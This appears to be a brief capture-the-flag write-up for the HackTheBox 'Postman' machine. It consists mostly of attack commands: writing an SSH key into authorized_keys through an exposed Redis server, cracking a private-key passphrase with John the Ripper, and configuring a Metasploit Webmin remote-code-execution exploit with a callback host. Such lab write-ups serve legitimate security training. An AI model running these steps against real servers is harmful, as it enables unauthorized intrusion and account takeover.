Postman @ HackTheBox
Postman is a 20-point machine on hackthebox, that involves using redis to write an ssh key to disk, cracking the password of a private key and exploiting a webmin vulnerability with metasploit.
Notes
Redis:
1
2
3
4
ssh-keygen
echo -e '\n\n' >> blob.txt
cat redis.pub >> blob.txt
echo -e "\n\n" >> blob.txt
1
2
3
4
CONFIG SET dir "/var/lib/redis/.ssh"
CONFIG SET dbfilename "authorized_keys"
flushall
exit
1
2
cat blob.txt | redis-cli -h postman.htb -x set ssh
redis-cli -h postman.htb save
1
ssh -i redis redis@postman.htb
John:
1
2
ssh2john.py matt | tee matt.hash
john --wordlist=rockyou.txt matt.hash
Metasploit:
1
2
3
4
5
msf: search webmin, use exploit/linux/http/webmin_packageup_rce
msf5 exploit(linux/http/webmin_packageup_rce) > set PASSWORD computer2008
msf5 exploit(linux/http/webmin_packageup_rce) > set RHOSTS postman.htb
msf5 exploit(linux/http/webmin_packageup_rce) > set USERNAME Matt
msf5 exploit(linux/http/webmin_packageup_rce) > set LHOST <ip>
This post is licensed under CC BY 4.0 by the author.